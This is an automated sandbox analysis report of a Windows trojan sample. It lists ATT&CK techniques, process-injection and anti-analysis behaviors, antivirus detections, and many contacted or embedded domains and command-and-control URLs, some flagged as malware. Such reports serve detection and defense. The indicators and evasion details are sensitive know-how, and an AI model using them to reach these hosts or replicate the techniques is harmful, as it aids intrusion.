          Source: Yara matchFile source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Valid Accounts          		1
          Native API          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		11
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		1
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Valid Accounts          		1
          Abuse Elevation Control Mechanism          		Security Account Manager214
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Access Token Manipulation          		3
          Obfuscated Files or Information          		NTDS241
          Security Software Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script512
          Process Injection          		12
          Software Packing          		LSA Secrets2
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials41
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Rootkit          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Valid Accounts          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          Access Token Manipulation          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd41
          Virtualization/Sandbox Evasion          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task512
          Process Injection          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
          Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
          Hidden Files and Directories          		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465386 Sample: yaM8XR1HfL.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 32 www.osthirmaker.com 2->32 34 www.nftees.tech 2->34 38 Snort IDS alert for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 10 other signatures 2->44 11 yaM8XR1HfL.exe 3 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\...\yaM8XR1HfL.exe.log, ASCII 11->30 dropped 54 Tries to detect virtualization through RDTSC time measurements 11->54 56 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->56 58 Injects a PE file into a foreign processes 11->58 60 Switches to a custom stack to bypass stack traces 11->60 15 yaM8XR1HfL.exe 11->15         started        18 yaM8XR1HfL.exe 11->18         started        signatures6 process7 signatures8 62 Modifies the context of a thread in another process (thread injection) 15->62 64 Maps a DLL or memory area into another process 15->64 66 Sample uses process hollowing technique 15->66 68 2 other signatures 15->68 20 explorer.exe 56 1 15->20 injected process9 dnsIp10 36 www.nftees.tech 217.160.0.1, 49718, 80 ONEANDONE-ASBrauerstrasse48DE Germany 20->36 23 WWAHost.exe 20->23         started        process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 23->46 48 Maps a DLL or memory area into another process 23->48 50 Tries to detect virtualization through RDTSC time measurements 23->50 52 Switches to a custom stack to bypass stack traces 23->52 26 cmd.exe 1 23->26         started        process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          yaM8XR1HfL.exe68%ReversingLabsWin32.Trojan.Leonem
          yaM8XR1HfL.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://schemas.micro0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          https://api.msn.com/0%URL Reputationsafe
          http://www.dexcoenergy.com/na10/www.hokivegasslots.club0%Avira URL Cloudsafe
          http://www.nftees.tech/na10/0%Avira URL Cloudsafe
          www.liamcollinai.com/na10/0%Avira URL Cloudsafe
          http://www.giorgiaclerico.comReferer:0%Avira URL Cloudsafe
          https://word.office.comon0%Avira URL Cloudsafe
          http://www.productivagc.comReferer:0%Avira URL Cloudsafe
          http://www.abc8bet6.comReferer:0%Avira URL Cloudsafe
          http://www.nbvci.xyz/na10/www.abc8bet6.com0%Avira URL Cloudsafe
          http://www.bz59.topReferer:0%Avira URL Cloudsafe
          http://www.thelonelyteacup.com/na10/0%Avira URL Cloudsafe
          http://www.bz59.top/na10/www.jakobniinja.xyz0%Avira URL Cloudsafe
          http://www.nftees.techReferer:0%Avira URL Cloudsafe
          http://www.nbvci.xyzReferer:0%Avira URL Cloudsafe
          http://www.sasoera.com/na10/www.liamcollinai.com0%Avira URL Cloudsafe
          http://www.giorgiaclerico.com0%Avira URL Cloudsafe
          https://powerpoint.office.comcember0%Avira URL Cloudsafe
          http://www.nona23.lat/na10/www.giorgiaclerico.com100%Avira URL Cloudmalware
          http://www.dexcoenergy.comReferer:0%Avira URL Cloudsafe
          https://excel.office.com0%Avira URL Cloudsafe
          http://www.snykee.com/na10/www.awclog.com0%Avira URL Cloudsafe
          http://www.nbvci.xyz0%Avira URL Cloudsafe
          http://www.osthirmaker.comReferer:0%Avira URL Cloudsafe
          http://www.hokivegasslots.club/na10/www.thelonelyteacup.com0%Avira URL Cloudsafe
          http://www.liamcollinai.com0%Avira URL Cloudsafe
          http://www.snykee.com/na10/0%Avira URL Cloudsafe
          http://www.abc8bet6.com/na10/www.productivagc.com0%Avira URL Cloudsafe
          http://www.osthirmaker.com/na10/www.nftees.tech0%Avira URL Cloudsafe
          http://www.awclog.com/na10/www.sasoera.com0%Avira URL Cloudsafe
          http://www.nftees.tech/na10/www.nbvci.xyz0%Avira URL Cloudsafe
          http://www.awclog.com0%Avira URL Cloudsafe
          http://www.osthirmaker.com/na10/0%Avira URL Cloudsafe
          http://www.nona23.latReferer:0%Avira URL Cloudsafe
          http://www.liamcollinai.comReferer:0%Avira URL Cloudsafe
          http://www.giorgiaclerico.com/na10/0%Avira URL Cloudsafe
          http://www.snykee.com0%Avira URL Cloudsafe
          http://www.nbvci.xyz/na10/0%Avira URL Cloudsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%Avira URL Cloudsafe
          http://www.productivagc.com/na10/www.dexcoenergy.com100%Avira URL Cloudmalware
          http://www.nftees.tech/na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h0%Avira URL Cloudsafe
          https://wns.windows.com/)s0%Avira URL Cloudsafe
          http://www.nftees.tech0%Avira URL Cloudsafe
          http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
          http://www.liamcollinai.com/na10/www.nona23.lat0%Avira URL Cloudsafe
          http://www.thelonelyteacup.comReferer:0%Avira URL Cloudsafe
          http://www.nona23.lat0%Avira URL Cloudsafe
          http://www.awclog.comReferer:0%Avira URL Cloudsafe
          http://www.jakobniinja.xyz0%Avira URL Cloudsafe
          http://www.hokivegasslots.club/na10/0%Avira URL Cloudsafe
          http://www.hokivegasslots.clubReferer:0%Avira URL Cloudsafe
          http://www.abc8bet6.com0%Avira URL Cloudsafe
          http://www.productivagc.com/na10/0%Avira URL Cloudsafe
          http://www.jakobniinja.xyz/na10/0%Avira URL Cloudsafe
          http://www.snykee.comReferer:0%Avira URL Cloudsafe
          http://www.liamcollinai.com/na10/0%Avira URL Cloudsafe
          https://outlook.com0%Avira URL Cloudsafe
          http://www.thelonelyteacup.com0%Avira URL Cloudsafe
          http://www.osthirmaker.com0%Avira URL Cloudsafe
          http://www.awclog.com/na10/0%Avira URL Cloudsafe
          http://www.jakobniinja.xyzReferer:0%Avira URL Cloudsafe
          http://www.jakobniinja.xyz/na10/e0%Avira URL Cloudsafe
          http://www.sasoera.com/na10/0%Avira URL Cloudsafe
          http://www.giorgiaclerico.com/na10/www.bz59.top0%Avira URL Cloudsafe
          http://www.hokivegasslots.club0%Avira URL Cloudsafe
          http://www.sasoera.comReferer:0%Avira URL Cloudsafe
          http://www.dexcoenergy.com0%Avira URL Cloudsafe
          http://www.thelonelyteacup.com/na10/www.snykee.com0%Avira URL Cloudsafe
          http://www.bz59.top0%Avira URL Cloudsafe
          http://www.dexcoenergy.com/na10/0%Avira URL Cloudsafe
          http://ns.adobe.0%Avira URL Cloudsafe
          http://www.productivagc.com0%Avira URL Cloudsafe
          http://crl.v0%Avira URL Cloudsafe
          http://iptc.org/std/Iptc4xmde0%Avira URL Cloudsafe
          http://www.bz59.top/na10/0%Avira URL Cloudsafe
          http://www.nona23.lat/na10/100%Avira URL Cloudmalware
          http://www.sasoera.com0%Avira URL Cloudsafe
          http://www.abc8bet6.com/na10/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.nftees.tech
          		217.160.0.1
          		truetrue
            		unknown
            www.osthirmaker.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              www.liamcollinai.com/na10/true
              • Avira URL Cloud: safe
              		unknown
              http://www.nftees.tech/na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06htrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.bz59.topReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://word.office.comonexplorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.thelonelyteacup.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nbvci.xyz/na10/www.abc8bet6.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.giorgiaclerico.comReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nftees.tech/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.productivagc.comReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.dexcoenergy.com/na10/www.hokivegasslots.clubexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.abc8bet6.comReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.giorgiaclerico.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://powerpoint.office.comcemberexplorer.exe, 00000007.00000000.2508398700.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3305263776.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.sasoera.com/na10/www.liamcollinai.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.bz59.top/na10/www.jakobniinja.xyzexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nbvci.xyzReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nftees.techReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nona23.lat/na10/www.giorgiaclerico.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.snykee.com/na10/www.awclog.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://excel.office.comexplorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009B86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.microexplorer.exe, 00000007.00000000.2501022529.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2501770890.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3301294769.0000000008870000.00000002.00000001.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.dexcoenergy.comReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nbvci.xyzexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.hokivegasslots.club/na10/www.thelonelyteacup.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.osthirmaker.comReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.liamcollinai.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.snykee.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.osthirmaker.com/na10/www.nftees.techexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.abc8bet6.com/na10/www.productivagc.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.awclog.com/na10/www.sasoera.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nftees.tech/na10/www.nbvci.xyzexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.awclog.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.osthirmaker.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.snykee.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nbvci.xyz/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000007.00000002.3305263776.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2508398700.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.giorgiaclerico.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.liamcollinai.comReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nona23.latReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.productivagc.com/na10/www.dexcoenergy.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://wns.windows.com/)sexplorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nftees.techexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000007.00000000.2509419071.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2652534535.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2509419071.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3306031223.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.hokivegasslots.club/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.liamcollinai.com/na10/www.nona23.latexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nona23.latexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.awclog.comReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.thelonelyteacup.comReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.hokivegasslots.clubReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.jakobniinja.xyzexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.productivagc.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.abc8bet6.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.jakobniinja.xyz/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.liamcollinai.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.snykee.comReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.awclog.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://outlook.comexplorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009D42000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.thelonelyteacup.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.osthirmaker.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.jakobniinja.xyzReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.jakobniinja.xyz/na10/eexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.giorgiaclerico.com/na10/www.bz59.topexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.hokivegasslots.clubexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.sasoera.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://android.notify.windows.com/iOSexplorer.exe, 00000007.00000002.3299618126.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.bz59.topexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.sasoera.comReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.dexcoenergy.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.dexcoenergy.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://api.msn.com/explorer.exe, 00000007.00000000.2502264257.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.thelonelyteacup.com/na10/www.snykee.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://ns.adobe.yaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.productivagc.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.vexplorer.exe, 00000007.00000000.2496782788.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://iptc.org/std/Iptc4xmdeyaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.sasoera.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.bz59.top/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.nona23.lat/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.abc8bet6.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              217.160.0.1
              		www.nftees.techGermany
              		8560ONEANDONE-ASBrauerstrasse48DEtrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1465386
              Start date and time:2024-07-01 15:53:18 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 25s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:11
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:yaM8XR1HfL.exe
              renamed because original name is a hash value
              Original Sample Name:148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@10/1@2/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 209
              • Number of non-executed functions: 114
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
